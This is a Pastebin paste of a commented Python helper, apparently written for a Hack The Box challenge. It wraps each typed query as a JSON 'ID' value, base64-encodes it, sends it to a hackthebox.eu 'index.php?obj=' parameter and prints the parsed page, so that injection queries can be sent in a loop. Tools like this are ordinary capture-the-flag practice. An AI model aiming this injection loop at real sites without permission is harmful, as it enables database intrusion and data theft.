Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- #requests is a good python way for us to get the page and manipulate web requests
- import requests
- #our hint at the bottom of the page says that we may need to be performing some base64 encoding
- import base64
- #parse out all the html and just show us content, makes usage of the program a little easier
- from bs4 import BeautifulSoup
- #used to get arguments and exit using system function
- import sys
- #library to help us close the program if keyboard interrupt is pressed
- import signal
- #Error Handling
- from builtins import ConnectionRefusedError
- if (input == "exit"):
- print("Goodbye")
- sys.exit()
- #Checks to make sure you used correct number of args
- if (len(sys.argv) != 2):
- #basic string formatting
- print("Usage: {} <port number>".format(sys.argv[0]))
- #tell system to exit the program
- sys.exit()
- #make a function to kill our infinite program when ctrl + c is pressed
- def keyboardInterruptHandler(signal,frame):
- print("\nKeyboardInterrupt detected. Exiting...")
- sys.exit()
- #use the signal library to detect the press, and execute our handler
- signal.signal(signal.SIGINT, keyboardInterruptHandler)
- #set port to whatever argv 1 was
- port = sys.argv[1]
- #infinite loop for injections to never stop
- while True:
- try:
- #get injection input from user
- oofValue = input("Query for ID param here: ")
- #create an unencoded utf styled object, adding our payload from the user input in
- payloadStringUnencoded = '{\"ID\":\"' + oofValue + '\"}'
- #base 64 encode the string after it has been transformed into a bytes object
- payloadStringEncoded = base64.b64encode(bytes(payloadStringUnencoded, encoding='ascii'))
- #final payload that is re encoded back into utf-8
- finalPayload = payloadStringEncoded.decode("utf-8")
- #injection url, rigged with the port number and our payload
- requestURL = "http://docker.hackthebox.eu:{0}/index.php?obj={1}".format(port,finalPayload)
- #go get the juicy data
- requestObject = requests.get(url = requestURL)
- #return it as pure html, this way we can just pull all the weird info
- pageToParse = requestObject.text
- #parse out valid string content using BeautifulSoup
- outData = BeautifulSoup(pageToParse, 'lxml')
- print(outData.text.strip())
- except requests.exceptions.ConnectionError:
- print("Connection refused, check your port")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement